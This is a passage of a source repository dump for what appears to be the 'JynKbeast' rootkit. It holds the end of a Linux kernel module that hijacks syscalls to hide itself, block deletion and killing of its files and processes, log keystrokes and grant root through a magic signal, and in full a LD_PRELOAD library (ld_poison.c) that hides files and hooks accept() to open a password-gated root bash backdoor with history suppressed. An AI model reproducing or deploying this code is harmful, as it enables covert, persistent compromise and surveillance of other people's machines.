664 | int r; 665 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 666 | copy_from_user(kbuf,pathname,255); 667 | if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)){ 668 | kfree(kbuf); 669 | return -EACCES; 670 | } 671 | r=(*o_rmdir)(pathname); 672 | kfree(kbuf); 673 | return r; 674 | } 675 | 676 | /*Don't allow your file and directory to be removed (2.6.32)*/ 677 | asmlinkage int h4x_unlinkat(int dfd, const char __user * pathname, int flag) { 678 | int r; 679 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 680 | copy_from_user(kbuf,pathname,255); 681 | if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)){ 682 | kfree(kbuf); 683 | return -EACCES; 684 | } 685 | r=(*o_unlinkat)(dfd,pathname,flag); 686 | kfree(kbuf); 687 | return r; 688 | } 689 | 690 | /*Don't allow your file to be renamed/moved*/ 691 | asmlinkage int h4x_rename(const char __user *oldname, const char __user *newname) { 692 | int r; 693 | char *oldkbuf=(char*)kmalloc(256,GFP_KERNEL); 694 | char *newkbuf=(char*)kmalloc(256,GFP_KERNEL); 695 | copy_from_user(oldkbuf,oldname,255); 696 | copy_from_user(newkbuf,newname,255); 697 | if(strstr(oldkbuf,_H4X0R_)||strstr(newkbuf,_H4X0R_)||strstr(oldkbuf,KBEAST)||strstr(newkbuf,KBEAST)){ 698 | kfree(oldkbuf); 699 | kfree(newkbuf); 700 | return -EACCES; 701 | } 702 | r=(*o_rename)(oldname,newname); 703 | kfree(oldkbuf); 704 | kfree(newkbuf); 705 | return r; 706 | } 707 | 708 | /*Don't allow your file to be overwrited*/ 709 | asmlinkage int h4x_open(const char __user *filename, int flags, int mode) { 710 | int r; 711 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 712 | copy_from_user(kbuf,filename,255); 713 | //bits/fcntl.h O_WRONLY|O_TRUNC|O_LARGEFILE is 0101001 714 | if((strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)) && flags == 0101001){ 715 | kfree(kbuf); 716 | return -EACCES; 717 | } 718 | r=(*o_open)(filename,flags,mode); 719 | return r; 720 | } 721 | 722 | /* 723 | Don't allow your process to be killed 724 | Allow local root escalation using magic signal dan pid 725 | */ 726 | asmlinkage int h4x_kill(int pid, int sig) { 727 | int r; 728 | struct task_struct *cur; 729 | cur = CTASK_BY_PID; 730 | if(cur){ 731 | if(strstr(cur->comm,_H4X0R_)||strstr(cur->comm,KBEAST)){ 732 | return -EACCES; 733 | } 734 | } 735 | if(sig == _MAGIC_SIG_ && pid == _MAGIC_PID_){ 736 | NEW_CREDENTIAL 737 | return 0; 738 | } 739 | r = (*o_kill)(pid,sig); 740 | return r; 741 | } 742 | 743 | asmlinkage int h4x_delete_module(const char __user *name_user, unsigned int flags){ 744 | int r; 745 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 746 | copy_from_user(kbuf,name_user,255); 747 | if(strstr(kbuf,KBEAST)){ 748 | kfree(kbuf); 749 | return -EACCES; 750 | } 751 | r=(*o_delete_module)(name_user, flags); 752 | return r; 753 | } 754 | 755 | /*init module insmod*/ 756 | static int init(void) 757 | { 758 | //Uncomment to hide this module 759 | list_del_init(&__this_module.list); 760 | 761 | struct tcp_seq_afinfo *my_afinfo = NULL; 762 | //proc_net is disappeared in 2.6.32, use init_net.proc_net 763 | struct proc_dir_entry *my_dir_entry = PROC_NET->subdir; 764 | 765 | write_cr0 (read_cr0 () & (~ 0x10000)); 766 | if(_KEYLOG_){ 767 | o_read=(void *)sys_call_table[__NR_read]; 768 | sys_call_table[__NR_read]=h4x_read; 769 | } 770 | o_write=(void *)sys_call_table[__NR_write]; 771 | sys_call_table[__NR_write]=h4x_write; 772 | #if defined(__x86_64__) 773 | o_getdents=sys_call_table [__NR_getdents]; 774 | sys_call_table [__NR_getdents]=h4x_getdents; 775 | #elif defined(__i386__) 776 | o_getdents64=sys_call_table [__NR_getdents64]; 777 | sys_call_table [__NR_getdents64]=h4x_getdents64; 778 | #else 779 | #error Unsupported architecture 780 | #endif 781 | o_unlink = sys_call_table [__NR_unlink]; 782 | sys_call_table [__NR_unlink] = h4x_unlink; 783 | o_rmdir = sys_call_table [__NR_rmdir]; 784 | sys_call_table [__NR_rmdir] = h4x_rmdir; 785 | o_unlinkat = sys_call_table [__NR_unlinkat]; 786 | sys_call_table [__NR_unlinkat] = h4x_unlinkat; 787 | o_rename = sys_call_table [__NR_rename]; 788 | sys_call_table [__NR_rename] = h4x_rename; 789 | o_open = sys_call_table [__NR_open]; 790 | sys_call_table [__NR_open] = h4x_open; 791 | o_kill = sys_call_table [__NR_kill]; 792 | sys_call_table [__NR_kill] = h4x_kill; 793 | o_delete_module = sys_call_table [__NR_delete_module]; 794 | sys_call_table [__NR_delete_module] = h4x_delete_module; 795 | 796 | o_accept = sys_call_table [__NR_accept]; 797 | sys_call_table [__NR_accept] = my_accept; 798 | write_cr0 (read_cr0 () | 0x10000); 799 | 800 | while(strcmp(my_dir_entry->name, "tcp")) 801 | my_dir_entry = my_dir_entry->next; 802 | if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data)) 803 | { 804 | //seq_show is disappeared in 2.6.32, use seq_ops.show 805 | old_tcp4_seq_show = my_afinfo->SEQ_SHOW; 806 | my_afinfo->SEQ_SHOW = h4x_tcp4_seq_show; 807 | } 808 | return 0; 809 | } 810 | 811 | /*delete module rmmod*/ 812 | static void exit(void) 813 | { 814 | struct tcp_seq_afinfo *my_afinfo = NULL; 815 | //proc_net is disappeared 2.6.32, use init_net.proc_net 816 | struct proc_dir_entry *my_dir_entry = PROC_NET->subdir; 817 | 818 | write_cr0 (read_cr0 () & (~ 0x10000)); 819 | if(_KEYLOG_){ 820 | sys_call_table[__NR_read]=o_read; 821 | } 822 | sys_call_table[__NR_write]=o_write; 823 | #if defined(__x86_64__) 824 | sys_call_table[__NR_getdents] = o_getdents; 825 | #elif defined(__i386__) 826 | sys_call_table[__NR_getdents64] = o_getdents64; 827 | #else 828 | #error Unsupported architecture 829 | #endif 830 | sys_call_table[__NR_unlink] = o_unlink; 831 | sys_call_table[__NR_rmdir] = o_rmdir; 832 | sys_call_table[__NR_unlinkat] = o_unlinkat; 833 | sys_call_table[__NR_rename] = o_rename; 834 | sys_call_table[__NR_open] = o_open; 835 | sys_call_table[__NR_kill] = o_kill; 836 | sys_call_table[__NR_delete_module] = o_delete_module; 837 | write_cr0 (read_cr0 () | 0x10000); 838 | 839 | while(strcmp(my_dir_entry->name, "tcp")) 840 | my_dir_entry = my_dir_entry->next; 841 | if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data)) 842 | { 843 | //seq_show is disappeared in 2.6.32, use seq_ops.show 844 | my_afinfo->SEQ_SHOW=old_tcp4_seq_show; 845 | } 846 | return; 847 | } 848 | 849 | module_init(init); 850 | module_exit(exit); 851 | -------------------------------------------------------------------------------- /kbeast_LICENSE: -------------------------------------------------------------------------------- 1 | The kernel rootkit is based on some publicly known backdoors, these are: 2 | 3 | - Kernel Key Logger Mercenary 4 | - THC-VLOGGER 5 | - http://freeworld.thc.org/papers/LKM_HACKING.html 6 | - http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/ 7 | Modifying_and_Hacking_Security_Tools/Fun_with_Linux_Kernel_Modules 8 | - Some additional code and modification to work with more recent kernel 9 | 10 | Our recent development version works for linux kernel 2.6.18 and 2.6.32 or any 11 | else. 12 | All development credits go for IPSECS (c) 2011 http://ipsecs.com 13 | -------------------------------------------------------------------------------- /ld.so.preload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/ld.so.preload -------------------------------------------------------------------------------- /ld_poison.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include "md5.h" 18 | 19 | #include "config.h" 20 | 21 | #define BUFSIZZ 1024 22 | #define F_DUPFD 0 /* Duplicate file descriptor. */ 23 | #define F_GETFD 1 /* Get file descriptor flags. */ 24 | #define F_SETFD 2 /* Set file descriptor flags. */ 25 | #define F_GETFL 3 /* Get file status flags. */ 26 | #define F_SETFL 4 /* Set file status flags. */ 27 | #define O_NONBLOCK 04000 28 | #define O_NDELAY O_NONBLOCK 29 | 30 | 31 | static void init (void) __attribute__ ((constructor)); 32 | 33 | static int (*old_fxstat)(int ver, int fildes, struct stat *buf); 34 | static int (*old_fxstat64)(int ver, int fildes, struct stat64 *buf); 35 | static int (*old_lxstat)(int ver, const char *file, struct stat *buf); 36 | static int (*old_lxstat64)(int ver, const char *file, struct stat64 *buf); 37 | static int (*old_open)(const char *pathname, int flags, mode_t mode); 38 | static int (*old_rmdir)(const char *pathname); 39 | static int (*old_unlink)(const char *pathname); 40 | static int (*old_unlinkat)(int dirfd, const char *pathname, int flags); 41 | static int (*old_xstat)(int ver, const char *path, struct stat *buf); 42 | static int (*old_xstat64)(int ver, const char *path, struct stat64 *buf); 43 | 44 | static int (*old_accept)(int sockfd, struct sockaddr *addr, socklen_t *addrlen); 45 | 46 | static DIR *(*old_fdopendir)(int fd); 47 | static DIR *(*old_opendir)(const char *name); 48 | 49 | void getMD5(const char *ori,int len,char *buf); 50 | void enterpass(int s); 51 | 52 | 53 | static struct dirent *(*old_readdir)(DIR *dir); 54 | static struct dirent64 *(*old_readdir64)(DIR *dir); 55 | char *argv[] = { "bash", "-i", NULL }; 56 | char *envp[] = { "TERM=linux", "PS1=[root@remote-server]#", "BASH_HISTORY=/dev/null", 57 | "HISTORY=/dev/null", "history=/dev/null", "HOME=/usr/sbin/dnsdyn","HISTFILE=/dev/null", 58 | "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; 59 | 60 | 61 | void init(void) 62 | { 63 | #ifdef DEBUG 64 | printf("[-] ld_poison loaded.\n"); 65 | #endif 66 | 67 | old_fxstat = dlsym(RTLD_NEXT, "__fxstat"); 68 | old_fxstat64 = dlsym(RTLD_NEXT, "__fxstat64"); 69 | old_lxstat = dlsym(RTLD_NEXT, "__lxstat"); 70 | old_lxstat64 = dlsym(RTLD_NEXT, "__lxstat64"); 71 | old_open = dlsym(RTLD_NEXT,"open"); 72 | old_rmdir = dlsym(RTLD_NEXT,"rmdir"); 73 | old_unlink = dlsym(RTLD_NEXT,"unlink"); 74 | old_unlinkat = dlsym(RTLD_NEXT,"unlinkat"); 75 | old_xstat = dlsym(RTLD_NEXT, "__xstat"); 76 | old_xstat64 = dlsym(RTLD_NEXT, "__xstat64"); 77 | 78 | old_fdopendir = dlsym(RTLD_NEXT, "fdopendir"); 79 | old_opendir = dlsym(RTLD_NEXT, "opendir"); 80 | 81 | old_readdir = dlsym(RTLD_NEXT, "readdir"); 82 | old_readdir64 = dlsym(RTLD_NEXT, "readdir64"); 83 | 84 | old_accept = dlsym(RTLD_NEXT, "accept"); 85 | 86 | } 87 | void enterpass(int s){ 88 | //char *prompt="Password [displayed to screen]: "; 89 | char *motd="<< Welcome >>\n"; 90 | char buffer[64]={0x00}; 91 | 92 | //write(s,banner,strlen(banner)); 93 | //write(s,prompt,strlen(prompt)); 94 | read(s,buffer,sizeof(buffer)); 95 | /* 96 | //Hash password 97 | char trans[SALT_LENGTH+33] = {'\0'}; 98 | char tmp[3]={'\0'},buf[33]={'\0'},hash[33]={'\0'}; 99 | int i; 100 | for(i=0;i2) 106 | i--; 107 | getMD5(buffer,i,buf); 108 | strncpy(trans,_SALT_,SALT_LENGTH); 109 | for(i=0;i<32;i++){ 110 | trans[SALT_LENGTH+i]=buf[i]; 111 | } 112 | getMD5(trans,SALT_LENGTH+32,hash); 113 | sprintf(tmp, "%d",strlen(buf)); 114 | //End Hash Password 115 | printf("%s",hash); 116 | */ 117 | printf("%s\n",buffer); 118 | //if(!strncmp(hash, _RPASSWORD_, strlen(_RPASSWORD_))) { 119 | if(!strncmp(buffer, _RPASSWORD_, strlen(_RPASSWORD_))) { 120 | write(s,motd,strlen(motd)); 121 | }else { 122 | //write(s,"Wrong!\n", 7); 123 | close(s); 124 | _exit(0); 125 | } 126 | } 127 | /* 128 | * transfer char to its md5 char be know that buf must init with buf[33]={'\0'}; 129 | */ 130 | void getMD5(const char *ori,int len,char *buf){ 131 | unsigned char md[16]; 132 | char tmp[3]={'\0'}; 133 | int i; 134 | unsigned char tt[len]; 135 | for(i=0;isa_family == AF_INET) ){ 158 | struct sockaddr_in *cli_addr = (struct sockaddr_in *)addr; 159 | #ifdef DEBUG 160 | unsigned int th_sport = ntohl(cli_addr->sin_port); 161 | th_sport = th_sport>>16; 162 | printf("th_sport:%d\n",th_sport); 163 | #endif 164 | if( (cli_addr->sin_port == htons(_MAGIC_PORT_)) ){ 165 | pid_t child; 166 | if(cli<0) 167 | return cli; 168 | #ifdef DEBUG 169 | printf("magic-client-in\n"); 170 | #endif 171 | if((child=fork())==0){ 172 | //old none-crypted style 173 | close(sockfd); 174 | dup2(cli,0); 175 | dup2(cli,1); 176 | dup2(cli,2); 177 | //close(0); 178 | //fid = fcntl(cli, F_DUPFD, 0); 179 | //enterpass(cli); 180 | char *motd="<< Welcome >>\n"; 181 | char buffer[64]={0x00}; 182 | 183 | read(cli,buffer,sizeof(buffer)); 184 | /* 185 | //Hash password 186 | char trans[SALT_LENGTH+33] = {'\0'}; 187 | char tmp[3]={'\0'},buf[33]={'\0'},hash[33]={'\0'}; 188 | int i; 189 | for(i=0;i2) 195 | i--; 196 | getMD5(buffer,i,buf); 197 | strncpy(trans,_SALT_,SALT_LENGTH); 198 | for(i=0;i<32;i++){ 199 | trans[SALT_LENGTH+i]=buf[i]; 200 | } 201 | getMD5(trans,SALT_LENGTH+32,hash); 202 | printf("%s",hash); 203 | //End Hash Password 204 | */ 205 | //if(!strncmp(hash, _RPASSWORD_, strlen(_RPASSWORD_))) { 206 | if(!strncmp(buffer, _ACK_PWD_, strlen(_ACK_PWD_))) { 207 | write(cli,motd,strlen(motd)); 208 | execve("/bin/bash", argv, envp); 209 | //printf("disConnected."); 210 | close(cli); 211 | _exit(0); 212 | }else { 213 | //write(s,"Wrong!\n", 7); 214 | close(cli); 215 | _exit(0); 216 | } 217 | } 218 | wait(child); 219 | return -1; 220 | } 221 | } 222 | return cli; 223 | } 224 | 225 | 226 | int fstat(int fd, struct stat *buf) 227 | { 228 | struct stat s_fstat; 229 | 230 | #ifdef DEBUG 231 | printf("fstat hooked.\n"); 232 | #endif 233 | 234 | memset(&s_fstat, 0, sizeof(stat)); 235 | 236 | old_fxstat(_STAT_VER, fd, &s_fstat); 237 | 238 | if(s_fstat.st_gid == MAGIC_GID ) { 239 | errno = ENOENT; 240 | return -1; 241 | } 242 | 243 | return old_fxstat(_STAT_VER, fd, buf); 244 | } 245 | 246 | int fstat64(int fd, struct stat64 *buf) 247 | { 248 | struct stat64 s_fstat; 249 | 250 | #ifdef DEBUG 251 | printf("fstat64 hooked.\n"); 252 | #endif 253 | 254 | memset(&s_fstat, 0, sizeof(stat)); 255 | 256 | old_fxstat64(_STAT_VER, fd, &s_fstat); 257 | if(s_fstat.st_gid == MAGIC_GID){ 258 | errno = ENOENT; 259 | return -1; 260 | } 261 | 262 | return old_fxstat64(_STAT_VER, fd, buf); 263 | } 264 | 265 | int __fxstat(int ver, int fildes, struct stat *buf) 266 | { 267 | struct stat s_fstat; 268 | 269 | #ifdef DEBUG 270 | printf("__fxstat hooked.\n"); 271 | #endif 272 | 273 | memset(&s_fstat, 0, sizeof(stat)); 274 | 275 | old_fxstat(ver,fildes, &s_fstat); 276 | 277 | if(s_fstat.st_gid == MAGIC_GID) { 278 | errno = ENOENT; 279 | return -1; 280 | } 281 | return old_fxstat(ver,fildes, buf); 282 | } 283 | 284 | int __fxstat64(int ver, int fildes, struct stat64 *buf) 285 | { 286 | struct stat64 s_fstat; 287 | 288 | #ifdef DEBUG 289 | printf("__fxstat64 hooked.\n"); 290 | #endif 291 | 292 | memset(&s_fstat, 0, sizeof(stat)); 293 | 294 | old_fxstat64(ver, fildes, &s_fstat); 295 | 296 | if(s_fstat.st_gid == MAGIC_GID) { 297 | errno = ENOENT; 298 | return -1; 299 | } 300 | 301 | return old_fxstat64(ver, fildes, buf); 302 | } 303 | 304 | int lstat(const char *file, struct stat *buf) 305 | { 306 | struct stat s_fstat; 307 | 308 | #ifdef DEBUG 309 | printf("lstat hooked.\n"); 310 | #endif 311 | 312 | memset(&s_fstat, 0, sizeof(stat)); 313 | 314 | old_lxstat(_STAT_VER, file, &s_fstat); 315 | 316 | if(s_fstat.st_gid == MAGIC_GID || strstr(file,MAGIC_DIR)) { 317 | //if(s_fstat.st_gid == MAGIC_GID || strstr(file,CONFIG_FILE) || strstr(file,MAGIC_DIR)) { 318 | errno = ENOENT; 319 | return -1; 320 | } 321 | 322 | return old_lxstat(_STAT_VER, file, buf); 323 | } 324 | 325 | int lstat64(const char *file, struct stat64 *buf) 326 | { 327 | struct stat64 s_fstat; 328 | 329 | #ifdef DEBUG 330 | printf("lstat64 hooked.\n"); 331 | #endif 332 | 333 | memset(&s_fstat, 0, sizeof(stat)); 334 | 335 | old_lxstat64(_STAT_VER, file, &s_fstat); 336 | 337 | if (s_fstat.st_gid == MAGIC_GID || strstr(file,MAGIC_DIR)) { 338 | //if (s_fstat.st_gid == MAGIC_GID || strstr(file,CONFIG_FILE) || strstr(file,MAGIC_DIR)) { 339 | errno = ENOENT; 340 | return -1; 341 | } 342 | 343 | return old_lxstat64(_STAT_VER, file, buf); 344 | } 345 | 346 | int __lxstat(int ver, const char *file, struct stat *buf) 347 | { 348 | struct stat s_fstat; 349 | 350 | #ifdef DEBUG 351 | printf("__lxstat hooked.\n"); 352 | #endif 353 | 354 | memset(&s_fstat, 0, sizeof(stat)); 355 | 356 | old_lxstat(ver, file, &s_fstat); 357 | 358 | if (s_fstat.st_gid == MAGIC_GID || strstr(file,MAGIC_DIR)) { 359 | //if (s_fstat.st_gid == MAGIC_GID || strstr(file,CONFIG_FILE) || strstr(file,MAGIC_DIR)) { 360 | errno = ENOENT; 361 | return -1; 362 | } 363 | 364 | return old_lxstat(ver, file, buf); 365 | } 366 | 367 | int __lxstat64(int ver, const char *file, struct stat64 *buf) 368 | { 369 | struct stat64 s_fstat; 370 | 371 | #ifdef DEBUG 372 | printf("__lxstat64 hooked.\n"); 373 | #endif 374 | 375 | memset(&s_fstat, 0, sizeof(stat)); 376 | 377 | old_lxstat64(ver, file, &s_fstat); 378 | 379 | #ifdef DEBUG 380 | printf("File: %s\n",file); 381 | printf("GID: %d\n",s_fstat.st_gid); 382 | #endif 383 | 384 | if(s_fstat.st_gid == MAGIC_GID || strstr(file,MAGIC_DIR)) { 385 | //if(s_fstat.st_gid == MAGIC_GID || strstr(file,CONFIG_FILE) || strstr(file,MAGIC_DIR)) { 386 | errno = ENOENT; 387 | return -1; 388 | } 389 | 390 | return old_lxstat64(ver, file, buf); 391 | } 392 | 393 | int open(const char *pathname, int flags, mode_t mode) 394 | { 395 | struct stat s_fstat; 396 | 397 | #ifdef DEBUG 398 | printf("open hooked.\n"); 399 | #endif 400 | 401 | memset(&s_fstat, 0, sizeof(stat)); 402 | 403 | old_xstat(_STAT_VER, pathname, &s_fstat); 404 | 405 | if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL)) { 406 | //if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL) || (strstr(pathname, CONFIG_FILE) != NULL)) { 407 | errno = ENOENT; 408 | return -1; 409 | } 410 | 411 | return old_open(pathname,flags,mode); 412 | } 413 | 414 | int rmdir(const char *pathname) 415 | { 416 | struct stat s_fstat; 417 | 418 | #ifdef DEBUG 419 | printf("rmdir hooked.\n"); 420 | #endif 421 | 422 | memset(&s_fstat, 0, sizeof(stat)); 423 | 424 | old_xstat(_STAT_VER, pathname, &s_fstat); 425 | 426 | if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL)) { 427 | //if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL) || (strstr(pathname, CONFIG_FILE) != NULL)) { 428 | errno = ENOENT; 429 | return -1; 430 | } 431 | 432 | return old_rmdir(pathname); 433 | } 434 | 435 | int stat(const char *path, struct stat *buf) 436 | { 437 | struct stat s_fstat; 438 | 439 | #ifdef DEBUG 440 | printf("stat hooked\n"); 441 | #endif 442 | 443 | memset(&s_fstat, 0, sizeof(stat)); 444 | 445 | old_xstat(_STAT_VER, path, &s_fstat); 446 | 447 | #ifdef DEBUG 448 | printf("Path: %s\n",path); 449 | printf("GID: %d\n",s_fstat.st_gid); 450 | #endif 451 | 452 | if(s_fstat.st_gid == MAGIC_GID || strstr(path,MAGIC_DIR)) { 453 | //if(s_fstat.st_gid == MAGIC_GID || strstr(path,CONFIG_FILE) || strstr(path,MAGIC_DIR)) { 454 | errno = ENOENT; 455 | return -1; 456 | } 457 | 458 | return old_xstat(3, path, buf); 459 | } 460 | 461 | int stat64(const char *path, struct stat64 *buf) 462 | { 463 | struct stat64 s_fstat; 464 | 465 | #ifdef DEBUG 466 | printf("stat64 hooked.\n"); 467 | #endif 468 | 469 | memset(&s_fstat, 0, sizeof(stat)); 470 | 471 | old_xstat64(_STAT_VER, path, &s_fstat); 472 | 473 | if (s_fstat.st_gid == MAGIC_GID || strstr(path,MAGIC_DIR)) { 474 | //if (s_fstat.st_gid == MAGIC_GID || strstr(path,CONFIG_FILE) || strstr(path,MAGIC_DIR)) { 475 | errno = ENOENT; 476 | return -1; 477 | } 478 | 479 | return old_xstat64(_STAT_VER, path, buf); 480 | } 481 | 482 | int __xstat(int ver, const char *path, struct stat *buf) 483 | { 484 | struct stat s_fstat; 485 | 486 | #ifdef DEBUG 487 | printf("xstat hooked.\n"); 488 | #endif 489 | 490 | memset(&s_fstat, 0, sizeof(stat)); 491 | 492 | old_xstat(ver,path, &s_fstat); 493 | 494 | #ifdef DEBUG 495 | printf("Path: %s\n",path); 496 | printf("GID: %d\n",s_fstat.st_gid); 497 | #endif 498 | 499 | memset(&s_fstat, 0, sizeof(stat)); 500 | 501 | if(s_fstat.st_gid == MAGIC_GID || strstr(path,MAGIC_DIR)) { 502 | //if(s_fstat.st_gid == MAGIC_GID || strstr(path,CONFIG_FILE) || strstr(path,MAGIC_DIR)) { 503 | errno = ENOENT; 504 | return -1; 505 | } 506 | 507 | return old_xstat(ver,path, buf); 508 | } 509 | 510 | int __xstat64(int ver, const char *path, struct stat64 *buf) 511 | { 512 | struct stat64 s_fstat; 513 | 514 | #ifdef DEBUG 515 | printf("xstat64 hooked.\n"); 516 | #endif 517 | 518 | memset(&s_fstat, 0, sizeof(stat)); 519 | 520 | old_xstat64(ver,path, &s_fstat); 521 | 522 | #ifdef DEBUG 523 | printf("Path: %s\n",path); 524 | printf("GID: %d\n",s_fstat.st_gid); 525 | #endif 526 | 527 | if(s_fstat.st_gid == MAGIC_GID || strstr(path,MAGIC_DIR)) { 528 | //if(s_fstat.st_gid == MAGIC_GID || strstr(path,CONFIG_FILE) || strstr(path,MAGIC_DIR)) { 529 | errno = ENOENT; 530 | return -1; 531 | } 532 | 533 | return old_xstat64(ver,path, buf); 534 | } 535 | 536 | int unlink(const char *pathname) 537 | { 538 | struct stat s_fstat; 539 | 540 | #ifdef DEBUG 541 | printf("unlink hooked.\n"); 542 | #endif 543 | 544 | memset(&s_fstat, 0, sizeof(stat)); 545 | 546 | old_xstat(_STAT_VER, pathname, &s_fstat); 547 | 548 | if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL)) { 549 | //if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL) || (strstr(pathname, CONFIG_FILE) != NULL)) { 550 | errno = ENOENT; 551 | return -1; 552 | } 553 | 554 | return old_unlink(pathname); 555 | } 556 | 557 | int unlinkat(int dirfd, const char *pathname, int flags) 558 | { 559 | struct stat s_fstat; 560 | 561 | #ifdef DEBUG 562 | printf("unlinkat hooked.\n"); 563 | #endif 564 | 565 | memset(&s_fstat, 0, sizeof(stat)); 566 | 567 | old_fxstat(_STAT_VER, dirfd, &s_fstat); 568 | 569 | if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL)) { 570 | //if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL) || (strstr(pathname, CONFIG_FILE) != NULL)) { 571 | errno = ENOENT; 572 | return -1; 573 | } 574 | 575 | return old_unlinkat(dirfd, pathname, flags); 576 | } 577 | 578 | DIR *fdopendir(int fd) 579 | { 580 | struct stat s_fstat; 581 | 582 | #ifdef DEBUG 583 | printf("fdopendir hooked.\n"); 584 | #endif 585 | 586 | memset(&s_fstat, 0, sizeof(stat)); 587 | 588 | old_fxstat(_STAT_VER, fd, &s_fstat); 589 | 590 | if(s_fstat.st_gid == MAGIC_GID) { 591 | errno = ENOENT; 592 | return NULL; 593 | } 594 | 595 | return old_fdopendir(fd); 596 | } 597 | 598 | DIR *opendir(const char *name) 599 | { 600 | struct stat s_fstat; 601 | 602 | #ifdef DEBUG 603 | printf("opendir hooked.\n"); 604 | #endif 605 | 606 | memset(&s_fstat, 0, sizeof(stat)); 607 | 608 | old_xstat(_STAT_VER, name, &s_fstat); 609 | 610 | if(s_fstat.st_gid == MAGIC_GID || strstr(name,MAGIC_DIR)) { 611 | //if(s_fstat.st_gid == MAGIC_GID || strstr(name,CONFIG_FILE) || strstr(name,MAGIC_DIR)) { 612 | //printf("name"); 613 | errno = ENOENT; 614 | return NULL; 615 | } 616 | 617 | return old_opendir(name); 618 | } 619 | 620 | struct dirent *readdir(DIR *dirp) 621 | { 622 | struct dirent *dir; 623 | struct stat s_fstat; 624 | 625 | memset(&s_fstat, 0, sizeof(stat)); 626 | 627 | #ifdef DEBUG 628 | printf("readdir hooked.\n"); 629 | #endif 630 | 631 | do { 632 | dir = old_readdir(dirp); 633 | 634 | if (dir != NULL && (strcmp(dir->d_name,".\0") == 0 || strcmp(dir->d_name,"/\0") == 0)) 635 | continue; 636 | 637 | if(dir != NULL) { 638 | char path[PATH_MAX + 1]; 639 | snprintf(path,PATH_MAX,"/proc/%s",dir->d_name); 640 | old_xstat(_STAT_VER, path, &s_fstat); 641 | } 642 | } while(dir && (strstr(dir->d_name, MAGIC_DIR) != 0 || s_fstat.st_gid == MAGIC_GID)); 643 | //while(dir && (strstr(dir->d_name, MAGIC_DIR) != 0 || strstr(dir->d_name, CONFIG_FILE) != 0 || s_fstat.st_gid == MAGIC_GID)); 644 | //} while(dir && (strstr(dir->d_name, MAGIC_DIR) == NULL) && (strstr(dir->d_name, CONFIG_FILE) == NULL) && (s_fstat.st_gid != MAGIC_GID) ); 645 | 646 | return dir; 647 | } 648 | 649 | struct dirent64 *readdir64(DIR *dirp) 650 | { 651 | struct dirent64 *dir; 652 | struct stat s_fstat; 653 | 654 | memset(&s_fstat, 0, sizeof(stat)); 655 | 656 | #ifdef DEBUG 657 | printf("readdir64 hooked.\n"); 658 | #endif 659 | 660 | do { 661 | dir = old_readdir64(dirp); 662 | 663 | if (dir != NULL && (strcmp(dir->d_name,".\0") == 0 || strcmp(dir->d_name,"/\0") == 0)) 664 | continue; 665 | 666 | if(dir != NULL) { 667 | char path[PATH_MAX + 1]; 668 | snprintf(path,PATH_MAX,"/proc/%s",dir->d_name); 669 | old_xstat(_STAT_VER, path, &s_fstat); 670 | } 671 | } while(dir && (strstr(dir->d_name, MAGIC_DIR) != 0 || s_fstat.st_gid == MAGIC_GID)); 672 | //while(dir && (strstr(dir->d_name, MAGIC_DIR) != 0 || strstr(dir->d_name, CONFIG_FILE) != 0 || s_fstat.st_gid == MAGIC_GID)); 673 | //} while(dir && (strstr(dir->d_name, MAGIC_DIR) == NULL) && (strstr(dir->d_name, CONFIG_FILE) == NULL) && (s_fstat.st_gid != MAGIC_GID) ); 674 | 675 | return dir; 676 | } 677 | -------------------------------------------------------------------------------- /ld_poison.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/ld_poison.so -------------------------------------------------------------------------------- /ld_poison_debug.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/ld_poison_debug.so -------------------------------------------------------------------------------- /make.log: -------------------------------------------------------------------------------- 1 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_read’: 2 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:604: warning: label ‘END’ defined but not used 3 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:356: warning: unused variable ‘date_time’ 4 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:355: warning: unused variable ‘i’ 5 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:360: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 6 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_write’: 7 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:620: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 8 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_getdents64’: 9 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:682: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 10 | 